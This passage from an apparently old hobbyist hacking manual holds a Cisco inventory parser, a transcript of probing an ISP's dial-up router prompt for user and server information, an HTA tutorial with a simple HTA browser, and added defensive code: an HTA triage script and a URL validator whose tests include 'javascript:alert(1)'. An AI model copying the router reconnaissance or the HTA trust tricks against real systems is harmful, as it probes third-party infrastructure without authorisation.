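UPTIME_RE = re.compile(r"^(?P<host>\S+) uptime is (?P<uptime>.+)$", re.M)
IMAGE_RE = re.compile(r'^System image file is "(?P<image>[^"]+)"', re.M)
CONFREG_RE = re.compile(r"^Configuration register is (?P<reg>0x[0-9A-Fa-f]+)", re.M)

UNIT_MINUTES = {"week": 7 * 24 * 60, "day": 24 * 60, "hour": 60, "minute": 1}


def parse_version_string(s):
    """'11.3(9)T' -> (11, 3, 9, 0, 'T'); '11.3(9.2)T' -> (11, 3, 9, 2, 'T')."""
    m = re.fullmatch(r"(\d+)\.(\d+)\((\d+)(?:\.(\d+))?\)([A-Za-z0-9]*)", s.strip())
    if not m:
        raise ValueError(f"unrecognised IOS version string: {s!r}")
    major, minor, maint, interim, train = m.groups()
    return (int(major), int(minor), int(maint), int(interim or 0), train)


def uptime_minutes(uptime):
    """'7 weeks, 1 day, 7 hours, 52 minutes' -> total minutes."""
    return sum(int(n) * UNIT_MINUTES[unit]
               for n, unit in re.findall(r"(\d+) (week|day|hour|minute)s?", uptime))


def parse_show_version(text):
    """Extract the fields an asset inventory needs from 'show version' output."""
    rec = {}
    m = VERSION_LINE_RE.search(text)
    if m:
        rec["feature_set"] = m.group("feature_set")
        rec["version"] = m.group("version")
        rec["version_tuple"] = parse_version_string(m.group("version"))
    m = PLATFORM_RE.search(text)
    if m:
        rec["platform"], rec["cpu"] = m.group("platform"), m.group("cpu")
    m = UPTIME_RE.search(text)
    if m:
        rec["hostname"] = m.group("host")
        rec["uptime_minutes"] = uptime_minutes(m.group("uptime"))
    m = IMAGE_RE.search(text)
    if m:
        rec["image"] = m.group("image")
    m = CONFREG_RE.search(text)
    if m:
        reg = int(m.group("reg"), 16)
        rec["config_register"] = m.group("reg")
        # Bit 6 (0x0040) makes the router ignore its saved NVRAM configuration on boot.
        rec["ignores_nvram"] = bool(reg & 0x0040)
    return rec


# Placeholder policy floor for this example only: (major, minor, maint, interim).
MIN_VERSION = (12, 0, 0, 0)


def below_floor(version_tuple, floor=MIN_VERSION):
    """True when the numeric part of the version is older than the policy floor."""
    return tuple(version_tuple[:4]) < tuple(floor[:4])


if __name__ == "__main__":
    record = parse_show_version(SAMPLE_SHOW_VERSION)
    for key, value in record.items():
        print(f"{key:>16}: {value}")
    print("below policy floor:", below_floor(record["version_tuple"]))
```

The banner being readable from an ordinary dial-up login is the real finding in this section: the EXEC prompt hands show version, show snmp and who to every subscriber, and the usual fix is to start PPP automatically on the dial-in lines rather than dropping callers into an EXEC shell at all.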

The show command has some very useful parameters which can be used to get a lot of info. To get an entire list of parameters and a single line description, type:

delhinas4>show ?

WORD Flash device information - format <dev:>[partition]

bootflash Boot Flash information

calendar Display the hardware calendar

clock Display the system clock

context Show context information

dialer Dialer parameters and statistics

history Display the session command history

hosts IP domain-name, lookup style, nameservers, and host table

isdn ISDN information

location Display the system location

modem Modem Management or CSM information

modemcap Show Modem Capabilities database

ppp PPP parameters and statistics

rmon rmon statistics

sessions Information about Telnet connections

snmp snmp statistics

tacacs Shows tacacs+ server statistics

tdm TDM connection information

terminal Display terminal configuration parameters

traffic-shape traffic rate shaping configuration

users Display information about terminal lines

version System hardware and software status


The following are the results that I get when I try out the kewl parameters of the show command.

delhinas4>show calendar

16:19:06 UTC Sun Apr 16 2000

delhinas4>show hosts

Default domain is bol.net.in

Name/address lookup uses domain service

Name servers are 203.xx.243.70, 203.xx.227.70

Host Flags Age Type Address(es)

delhinas4>show modem

           Avg Hold  Inc calls   Out calls  Busied  Failed  No      Succ
  Mdm      Time      Succ  Fail  Succ Fail  Out     Dial    Answer  Pct.
  1/0  00:10:43 1375 375 0 0 0 0 125 78%
  1/1  00:10:52 1392 370 0 0 0 2 126 79%
* 1/2  00:11:36 1388 329 0 0 0 0 100 80%
* 1/3  00:12:19 1347 328 0 0 0 0 114 80%
  1/4  00:12:34 1326 334 0 0 0 2 101 79%
* 1/5  00:11:30 1375 341 0 0 0 1 85 80%
  1/6  00:12:26 1358 326 0 0 0 3 94 80%
* 1/7  00:11:20 1402 322 0 0 0 1 96 81%
* 1/8  00:11:26 1388 335 0 0 0 1 107 80%
  1/9  00:13:05 1328 313 0 0 0 3 111 80%
  1/10 00:10:59 1402 336 0 0 0 0 107 80%
  1/11 00:12:31 1349 323 0 0 0 1 115 80%
  1/12 00:13:12 1303 309 0 0 0 6 96 80%
* 1/13 00:12:11 1339 337 0 0 0 2 103 79%
* 1/14 00:11:08 1398 337 0 0 0 2 103 80%
  1/15 00:12:28 1328 342 0 0 0 3 96 79%
* 1/16 00:11:18 1416 320 0 0 0 2 96 81%
  1/17 00:11:41 1118 275 0 0 0 1 84 80%
* 1/18 00:12:03 1324 352 0 0 0 2 106 78%
  1/19 00:11:29 1369 371 0 0 0 1 120 78%
  1/20 00:11:25 1323 372 0 0 0 2 109 78%
  1/21 00:10:40 1431 340 0 0 0 2 111 80%
  1/22 00:12:12 1343 329 0 0 0 3 101 80%
  1/23 00:11:40 1363 330 0 0 0 0 102 80%
* 1/24 00:12:22 1340 317 0 0 0 0 113 80%
* 1/25 00:11:36 1383 348 0 0 0 3 128 79%
* 1/26 00:14:09 1297 294 0 0 0 1 99 81%
* 1/27 00:10:25 1436 359 0 0 0 1 103 80%
  1/28 00:11:08 1411 331 0 0 0 1 95 80%
  1/29 00:10:25 1438 343 0 0 0 0 99 80%
* 1/30 00:10:35 1443 352 0 0 0 2 104 80%
* 1/31 00:11:06 1434 325 0 0 0 0 108 81%
  1/32 00:11:30 1379 358 0 0 0 0 122 79%
  1/33 00:11:04 1406 345 0 0 0 2 107 80%
* 1/34 00:12:38 1321 338 0 0 0 0 105 79%
  1/35 00:12:14 1346 326 0 0 0 2 104 80%
* 1/36 00:11:13 1400 333 0 0 0 0 101 80%
  1/37 00:11:52 1338 363 0 0 0 1 99 78%
  1/38 00:13:19 1262 322 0 0 0 0 113 79%
* 1/39 00:11:39 1366 341 0 0 0 2 93 80%
  1/40 00:10:34 1380 396 0 0 0 0 122 77%
  1/41 00:10:36 1417 356 0 0 0 0 115 79%
  1/42 00:11:16 1404 306 0 0 1 3 95 82%
  1/43 00:11:43 1418 326 0 0 1 1 106 81%
  1/44 00:11:25 1347 367 0 0 1 2 105 78%
  1/45 00:11:22 1371 362 0 0 1 0 111 79%
* 1/46 00:12:08 1326 340 0 0 1 1 92 79%
  1/47 00:11:47 1365 358 0 0 1 1 111 79%
* 1/48 00:11:35 1359 341 0 0 0 2 98 79%
  1/49 00:11:12 1376 359 0 0 0 2 99 79%
* 1/50 00:12:10 1370 345 0 0 0 4 109 79%
* 1/51 00:12:00 1375 319 0 0 0 2 117 81%
* 1/52 00:11:41 1390 322 0 0 0 0 98 81%
  1/53 00:12:49 1330 330 0 0 0 0 98 80%
  1/54 00:11:35 1396 327 0 0 0 2 92 81%
* 1/55 00:12:43 1354 301 0 0 0 1 83 81%
  1/56 00:11:31 1379 341 0 0 0 1 109 80%
  1/57 00:12:00 1369 324 0 0 0 2 96 80%
  1/58 00:12:03 1342 361 0 0 0 0 103 78%
  1/59 00:12:17 1305 349 0 0 0 1 101 78%
* 2/0  00:12:11 1337 362 0 0 0 0 107 78%
  2/1  00:14:01 1251 322 0 0 0 2 98 79%
  2/2  00:12:34 1328 322 0 0 0 0 109 80%
  2/3  00:12:24 1358 318 0 0 0 0 105 81%
  2/4  00:12:24 1356 309 0 0 0 0 97 81%
  2/5  00:10:14 1451 344 0 0 0 1 103 80%
  2/6  00:12:18 1333 340 0 0 0 0 105 79%
* 2/7  00:12:35 1333 335 0 0 0 0 108 79%
  2/8  00:11:17 1427 346 0 0 0 1 129 80%
* 2/9  00:12:07 1361 299 0 0 0 0 95 81%
  2/10 00:10:47 1407 370 0 0 0 0 98 79%
  2/11 00:11:07 1409 333 0 0 0 2 102 80%
  2/12 00:10:51 1444 323 0 0 0 2 110 81%
* 2/13 00:10:11 1393 406 0 0 0 3 115 77%
  2/14 00:12:31 1228 315 0 0 0 2 110 79%
  2/15 00:10:41 1405 361 0 0 0 0 113 79%
  2/16 00:12:44 1357 295 0 0 0 0 87 82%
* 2/17 00:11:15 1362 355 0 0 0 1 102 79%
  2/18 00:11:30 1363 343 0 0 0 1 105 79%
  2/19 00:11:49 1349 350 0 0 0 1 110 79%
* 2/20 00:11:40 1341 347 0 0 0 3 102 79%
  2/21 00:11:40 1374 341 0 0 0 2 98 80%
  2/22 00:11:41 1378 329 0 0 0 0 101 80%
  2/23 00:12:35 1335 322 0 0 0 0 100 80%
  2/24 00:12:33 1353 309 0 0 0 1 91 81%
  2/25 00:11:36 1371 330 0 0 0 3 106 80%
* 2/26 00:11:18 1403 332 0 0 0 1 107 80%
* 2/27 00:11:56 1349 350 0 0 0 0 115 79%
* 2/28 00:10:41 1421 340 0 0 0 0 110 80%
  2/29 00:11:49 1352 326 0 0 0 0 116 80%
* 2/30 00:10:21 1446 353 0 0 0 1 120 80%
  2/31 00:11:33 853 219 0 0 0 0 69 79%
  2/32 00:12:09 1361 339 0 0 0 0 101 80%
  2/33 00:11:20 1388 346 0 0 0 1 113 80%
  2/34 00:12:27 1340 312 0 0 0 0 106 81%
  2/35 00:12:02 1348 340 0 0 0 3 101 79%
  2/36 00:11:18 1368 349 0 0 0 4 111 79%
  2/37 00:12:21 1346 320 0 0 0 2 116 80%
  2/38 00:11:59 1377 330 0 0 0 1 108 80%
  2/39 00:11:53 1406 303 0 0 0 0 98 82%
* 2/40 00:12:39 1340 335 0 0 0 1 97 80%
  2/41 00:11:20 1386 352 0 0 0 0 113 79%
* 2/42 00:11:06 1384 351 0 0 0 2 111 79%
* 2/43 00:12:15 1359 331 0 0 0 0 107 80%
  2/44 00:12:04 1365 331 0 0 0 1 95 80%
  2/45 00:11:04 1411 316 0 0 0 1 93 81%
* 2/46 00:12:02 1338 349 0 0 0 2 97 79%
  2/47 00:11:30 1396 345 0 0 0 0 91 80%
* 2/48 00:11:04 1406 338 0 0 0 3 108 80%
* 2/49 00:11:42 1368 349 0 0 0 0 114 79%
  2/50 00:12:09 1329 339 0 0 0 2 112 79%
* 2/51 00:11:56 1341 335 0 0 0 1 107 80%
* 2/52 00:10:42 1376 372 0 0 0 4 110 78%
  2/53 00:12:28 1309 345 0 0 0 1 122 79%
* 2/54 00:13:29 1315 295 0 0 0 1 90 81%
  2/55 00:11:22 1379 363 0 0 0 2 114 79%
* 2/56 00:13:40 1264 335 0 0 0 2 90 79%
  2/57 00:11:03 1367 367 0 0 0 1 128 78%
  2/58 00:10:58 1382 360 0 0 0 1 103 79%
* 2/59 00:12:11 1372 313 0 0 0 3 88 81%
Total: 00:11:45 163207 40377 0 0 6 146 12548 80%

delhinas4>show clock

*16:19:42.948 UTC Sun Apr 16 2000

delhinas4>show terminal

Line 61, Location: "", Type: ""

Length: 24 lines, Width: 80 columns

Status: Ready, Active, No Exit Banner, Modem Detected

Capabilities: Hardware Flowcontrol In, Hardware Flowcontrol Out

Modem Callout, Modem RI is CD, Line usable as async interface

Output non-idle, Modem Autoconfigure, Integrated Modem

Modem state: Ready

modem(slot/port)=2/0, state=CONNECTED

dsx1(slot/unit/channel)=0/1/20,

status=VDEV_STATUS_ACTIVE_CALL.VDEV_STATUS_ALLOCATED.

Modem hardware state: CTS DSR DTR RTS, Modem Configured

Special Chars: Escape  Hold  Stop  Start  Disconnect  Activation
                ^^x    none   -     -       none
Timeouts:      Idle EXEC    Idle Session   Modem Answer  Session   Dispatch
                00:10:00      00:20:00        none       not set
Session idle time reset by output.
               Idle Session Disconnect Warning
                00:01:00
               Login-sequence User Response
                00:00:30
               Autoselect Initial Wait
                not set

Modem type is new_modemcap3.

Session limit is not set.


delhinas4>show dialer

Serial0:0 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:1 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:2 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:3 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:4 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:5 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:6 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:7 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:8 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:9 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:10 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:11 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:12 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:13 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:14 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:15 - dialer type = ISDN

Dial String Successes Failures Last called Last status

0 incoming call(s) have been screened.

0 incoming call(s) rejected for callback.

Serial0:16 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:17 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:18 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:19 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:20 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:21 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:22 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:23 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:24 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:25 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:26 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:27 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:28 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:29 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:30 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

delhinas4>show snmp

Chassis: 11494401

646497 SNMP packets input

0 Bad SNMP version errors

0 Unknown community name

0 Illegal operation for community name supplied

1 Encoding errors

2402516 Number of requested variables

4 Number of altered variables

8281 Get-request PDUs

638211 Get-next PDUs

4 Set-request PDUs

918646 SNMP packets output

0 Too big errors (Maximum packet size 1500)

67 No such name errors

0 Bad values errors

0 General errors

646496 Response PDUs

272150 Trap PDUs

SNMP logging: enabled

Logging to 203.xx.243.63.162, 0/10, 270949 sent, 1201 dropped.

delhinas4>show history (This command displays a list of commands that you have typed since your last login.)

show terminal

how

show tacas

show dialer

who

mstat

localhost

help

where

show history

So this way you can use the Post Dial Up Screen, which I hope you would now call the Router Prompt, to get more information on users and also on the server of your ISP itself.

Making Your Own Browser (HTML APPLICATIONS)

I felt that this manual wasn't complete without a mention of HTA Applications.

HTA Applications are basically HTML Applications, which are unfortunately supported only by Internet Explorer 4 and above. An HTA Application is actually a full fledged application. With the development of HTAs, Internet Explorer can now be used for creating and distributing full fledged powerful applications over the net. Basically HTAs are a cross between normal .exe files and the web pages that are displayed by Internet Explorer.

Normally only proper programming languages like C++ or Perl or Visual Basic had access to system resources, but with the introduction of HTAs this power now extends to DHTML (Dynamic HyperText Markup Language).

HTA not only supports everything that a normal webpage supports, like CSS (Cascading Style Sheets), scripting languages, methods, behaviours etc., but also gives the developer access to the client's system, an opportunity to control the User Interface of the Application, and many other aspects which we couldn't control earlier. Best of all, it runs as a trusted application, which means it is not tied down with the same security restrictions normal web pages are subjected to. An HTA behaves like a normal .exe file, with the user being asked once, before the HTA is downloaded, whether to save or run the application; if saved to the client's system, it can be executed anytime later, just like a normal .exe file can be.

An HTA application is nothing but a .html file saved with a .hta extension name. The only difference between the commands that can be used on a web page and the commands that can be used in an HTA Application is the addition of some new commands which are native to HTA Applications. An HTA Application can be executed by double-clicking its program icon, running it from the Start menu, opening it through a URL, or starting it from the command line.

Now before we move on to HTA specific commands, let's write the mandatory Hello World! program. This program is just for formality's sake, so that you get the basic idea of how an HTA functions, and it is okay even if you do not understand anything yet. Just copy the following piece of code and save it with any name of your choice, just make sure that

<HTML>
<HEAD>
<TITLE>My First HTA</TITLE>
<HTA:APPLICATION>
</HEAD>
<BODY SCROLL="yes">
Hello World!!!
</BODY>
</HTML>

The .hta extension tells the system how to handle this particular application. The new HTA:APPLICATION tag tells the application window how to behave as an application. This new tag has many attributes which give us complete control over the function and the Application Window of our HTA. This new HTA:APPLICATION tag should appear within the HEAD tag and should contain the necessary attributes which control features of the HTA which are not available in DHTML. Now to understand the HTA specific attributes, let's take the following example:

<HEAD>
<TITLE>My First HTA Application</TITLE>
<HTA:APPLICATION ID="htapp"
    APPLICATIONNAME="My First HTA APP"
    BORDER="none"
    CAPTION="yes"
    ICON="/icon.gif"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="yes"
    SYSMENU="no"
    WINDOWSTATE="maximize"
>
</HEAD>

We conclude the following from the above piece of code:

1. When launched, the HTA is known to the system as My First HTA APP (controlled by the Applicationname attribute).

2. The HTA App does not have a border.(Controlled by Border Attribute.) When border is set to none, neither the window border, program icon, title bar, nor Minimize and Maximize buttons will display.

3. The HTA App will have a title bar or a caption bar.(Controlled by Caption Attribute). When CAPTION is set to no, the Minimize and Maximize buttons, the program icon, and the window border are disabled.

4. The icon which is displayed in Explorer or in the taskbar or in the title bar will be /icon.gif (controlled by the ICON attribute).

5. The HTA App will not be shown in the taskbar.(Controlled by Showintaskbar.)

6. Only a single instance of the app can be launched at a particular time.(Controlled by Singleinstance.)

7. It will not have a standard system program icon.(Controlled by Sysmenu.) When sysMenu is set to no, not only the program icon, but also the Minimize and Maximize buttons are disabled.

8. The HTA Window will be by default launched maximised.

9. The id attribute works the same way, it normally does.

When the above HTA is run, it shows the text within the <TITLE> tag on the caption bar of that application, and the code within the <BODY> tag is executed.

*********************

Hacking Truth: As HTAs are executed as fully trusted applications, they have the ability to carry out actions which Internet Explorer would never allow a regular web page to perform. HTAs have full permission to manipulate the client machine. An HTA has read/write access to the client machine's files, and also to the system registry. Command codes are also supported. They also allow cross domain scripting. Not only that, they also allow embedded Java Applets and ActiveX Controls to be run without any warning message, irrespective of the security settings of the browser.

To understand how HTA's security works, read the following excerpt from SBN:

------------------SBN--------------

HTA windows can extend the trust relationship to content in other domains.

HTAs allow cross-domain script access between window objects and cookies. To address the security risks inherent in cross-domain scripting, HTA enables the APPLICATION attribute for FRAMEs and IFRAMEs. This HTA-only attribute is not the sole security precaution available. HTAs are designed such that FRAMEs and IFRAMEs, where the APPLICATION attribute is set to no, have no script access to the HTA containing them. In this way, no unsecure content is allowed into an HTA through an untrusted window.

HTAs are designed such that untrusted HTML FRAMEs and IFRAMEs have no script access to the HTA containing them. In the case of FRAMEs that are not HTA-enabled, the highest level frame comprises the top window for all FRAMEs it contains. For that FRAME, window.top and window.self are one and the same. In addition, unsafe FRAMEs and IFRAMEs receive neither a referrer nor an opener URL from the parent HTA. The end result is that they are unaware of the containing HTA as the parent window. In applications where all content is safe, FRAMEs and IFRAMEs can safely be marked as trusted. Wizards and control panels are examples of safe content.

The HTA-enabled status of the IFRAME in the example below permits it to pass information back to its parent window.

<IFRAME SRC="filename.htm" APPLICATION="yes">

By contrast, an IFRAME that allows browsing to unsecured content must be implemented as regular HTML. Content in the IFRAME example below is subject to the security setting for its zone. The following IFRAME can be used when embedding HTML.

<IFRAME SRC="filename.htm" APPLICATION="no">

Note: The APPLICATION attribute is ignored if used in HTML rather than HTA. When running HTAs, users should take the same precautions as with any executable: Only install HTAs produced by reliable sources. HTAs cannot be code-signed. However, they can be installed from signed cabinet (.cab) files or other signed installation formats. Either way, the most accountable sources will be corporate intranets and established software vendors.

-------------------------SBN----------------------------------

So one can see how dangerous from a normal person's viewpoint, and how interesting from a hacker's viewpoint, HTAs can be. So basically, to save yourself from evil Java Applets, disable Java. Also run only those HTAs that are signed or that you receive from trusted senders.

************************
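The attribute list and the SBN excerpt above give you everything you need to look at an unknown .hta before you run it. The following is an added example (my own Node.js script, not code from the manual or from Microsoft) that does that look-over mechanically: it pulls the attributes out of the <HTA:APPLICATION> tag, flags the combinations that hide the window from the user (SHOWINTASKBAR, CAPTION, BORDER, SYSMENU), and reports every place the HTA extends its trust to other content, i.e. a FRAME or IFRAME with APPLICATION="yes", ActiveX, applets and objects. The sample HTA at the bottom is constructed for the demo; the hostname in it is a placeholder.

```javascript
// Added example: static triage of an .hta file with plain Node.js, no
// dependencies. Not part of the original manual.

// Return the attributes of every <tagName ...> tag in `source`, as an array of
// objects keyed by lower-cased attribute name. Values keep their original
// text. Quoted, single-quoted and bare values are accepted, and the tag may
// span several lines the way the HTA:APPLICATION examples in this chapter do.
function parseTags(source, tagName) {
  const tagRe = new RegExp('<' + tagName + '\\b([^>]*)>', 'gi');
  const attrRe = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  const tags = [];
  let m;
  while ((m = tagRe.exec(source)) !== null) {
    const attrs = {};
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
    }
    tags.push(attrs);
  }
  return tags;
}

const lower = (v) => (v || '').toLowerCase();

// Triage one HTA. Returns { application, findings }: `application` is the
// attribute object of the HTA:APPLICATION tag (or null), each finding is
// { level: 'high' | 'medium', text }.
function triageHta(source) {
  const findings = [];
  const application = parseTags(source, 'HTA:APPLICATION')[0] || null;

  if (application === null) {
    findings.push({ level: 'medium', text: 'no <HTA:APPLICATION> tag; mshta applies its default window settings' });
  } else {
    // Each of these removes a visual cue that a program is running.
    const hiding = [];
    if (lower(application.showintaskbar) === 'no') hiding.push('SHOWINTASKBAR=no');
    if (lower(application.caption) === 'no') hiding.push('CAPTION=no');
    if (lower(application.border) === 'none') hiding.push('BORDER=none');
    if (lower(application.sysmenu) === 'no') hiding.push('SYSMENU=no');
    if (hiding.length > 0) {
      findings.push({ level: hiding.length >= 3 ? 'high' : 'medium',
                      text: 'window hides itself from the user: ' + hiding.join(', ') });
    }
  }

  // FRAME/IFRAME: APPLICATION="yes" gives the child the HTA's full trust,
  // which is only acceptable for content you control. The default is "no".
  for (const tagName of ['FRAME', 'IFRAME']) {
    for (const frame of parseTags(source, tagName)) {
      if (lower(frame.application) !== 'yes') continue;
      const src = frame.src || '(no src)';
      const remote = /^(https?:)?\/\//i.test(src);
      findings.push({
        level: remote ? 'high' : 'medium',
        text: tagName + ' with APPLICATION="yes" extends HTA trust to ' +
              (remote ? 'remote' : 'local') + ' content: ' + src,
      });
    }
  }

  // Native capabilities a plain web page would never get.
  if (/\bnew\s+ActiveXObject\s*\(/i.test(source)) {
    findings.push({ level: 'high', text: 'script creates ActiveX objects (new ActiveXObject)' });
  }
  if (/<applet\b/i.test(source)) findings.push({ level: 'high', text: 'embeds a Java applet, which an HTA runs without any warning' });
  if (/<object\b/i.test(source)) findings.push({ level: 'medium', text: 'embeds an <OBJECT>' });

  return { application, findings };
}

// Constructed sample: the window settings of this chapter's first HTA plus a
// trusted remote frame and an ActiveX call. The hostname is a placeholder.
const SAMPLE_HTA = `<html><head><title>sample</title>
<HTA:APPLICATION
  APPLICATIONNAME="Sample"
  BORDER="none"
  CAPTION="no"
  SHOWINTASKBAR="no"
  SINGLEINSTANCE="yes"
  SYSMENU="no"
  WINDOWSTATE="maximize">
</head><body>
<iframe src="http://example.invalid/page.htm" application="yes"></iframe>
<iframe src="local.htm" application="no"></iframe>
<script>var fso = new ActiveXObject("Scripting.FileSystemObject");</script>
</body></html>`;

for (const f of triageHta(SAMPLE_HTA).findings) console.log('[' + f.level + '] ' + f.text);
```

Run it with node and the three findings for the sample come out as high: the window hides itself on four counts, the first IFRAME hands HTA trust to a remote page, and the script creates an ActiveX object. Point triageHta() at the text of any .hta you are sent and the same report tells you, before mshta ever sees the file, whether it is asking for more than a browser window would get.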

The following is the code of a browser that is actually an HTA, which I coded in HTML and JavaScript. To understand how it was made and to improve the code, you will need basic knowledge of the two.

This browser is based on the open source concept, and anyone can contribute to its code and improve its functionality. So all you hardcore programmers, charge your grey cells and contribute to the development of this browser.

All those of you who are new to hacking (programming), please take my advice and learn at least two or three programming languages. For the time being, use the browser below and start enjoying your browsing experience. Simply copy the following into Notepad or any other editor and save it with the extension .hta

<html>
<head>
<TITLE>The Hacking Truths Browser.</TITLE>
<HTA:APPLICATION
  APPLICATIONNAME="The Hacking Truths Browser."
  ICON="icon_name_here.ico"
  WINDOWSTATE="normal">
</head>
<body>
<span id=abar style="overflow: none">
  <span id=AText><b>Address</b></span>
  <input type=text value=http://hackingtruths.tripod.com id=URL width="80"
    style="width: expression(document.body.clientWidth - AText.offsetWidth - AGo.offsetWidth - 85)">
  <input type=button value="Go" id=AGo onclick="navigate()"><br>
</span>
<br>
<iframe src="http://hackingtruths.tripod.com" id=data style="width: 100%; height: 85%"></iframe>
<script language=JScript>
// Load whatever is in the address box into the content frame.
function navigate() {
  document.all.data.src = URL.value;
}
// Enter (key code 13) in the address box does the same as the Go button.
function clickShortcut() {
  if (window.event.keyCode == 13) {
    navigate()
  }
}
URL.onkeypress = clickShortcut;
</script>
<br>Coded By: <b>Ankit Fadia</b> ankit@bol.net.in<br>Visit us at: <a href="http://hackingtruths.tripod.com">http://hackingtruths.tripod.com</a>
</body>
</html>
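One thing worth improving in the browser above: navigate() assigns whatever is typed into the address box straight to the IFRAME's src, inside a fully trusted HTA, so a file:, javascript: or res: target is accepted as readily as a web site. The function below is an added example (my own, not part of the browser's code) that keeps the address box to http and https URLs, treats a bare host name or host:port as http://, and rejects everything else. It is written in plain ES3-style JavaScript on purpose so the same function runs under Node.js and under the JScript engine of an HTA; nothing in it is specific to either.

```javascript
// Added example: validate the address box before it reaches the content
// frame. Not part of the original browser.

// Returns the URL to load as a string, or null when the input is not a web
// URL. Only http and https with a host part are accepted; userinfo
// ("user:pass@host") is rejected along with every other scheme.
function allowedTarget(input) {
  var text = (input == null ? '' : String(input)).replace(/^\s+|\s+$/g, '');
  if (text === '') return null;

  // Does the text start with a scheme? "host:8080" is a port, not a scheme,
  // so digits followed by a path separator or the end do not count.
  var hasScheme = /^[a-z][a-z0-9+.\-]*:(?!\d+(?:[\/?#]|$))/i.test(text);
  if (!hasScheme) text = 'http://' + text;

  // scheme://host[:port] followed by a path, query, fragment or nothing.
  // The host is a DNS name / IPv4 literal or a bracketed IPv6 literal.
  var ok = /^https?:\/\/(?:[a-z0-9.\-]+|\[[0-9a-f:.]+\])(?::\d{1,5})?(?:[\/?#]|$)/i.test(text);
  return ok ? text : null;
}

// How the browser's navigate() would use it (JScript, inside the HTA):
//
//   function navigate() {
//     var target = allowedTarget(URL.value);
//     if (target === null) { URL.value = ''; return; }
//     document.all.data.src = target;
//   }

// Quick demo of the decisions it makes.
var samples = [
  'hackingtruths.tripod.com', 'localhost:8080/index.htm',
  'https://example.com/a?b=1', 'file:///C:/notes.txt',
  'javascript:alert(1)', 'res://some.dll/page', 'http:', ''
];
for (var i = 0; i < samples.length; i++) {
  console.log(JSON.stringify(samples[i]) + ' -> ' + allowedTarget(samples[i]));
}
```

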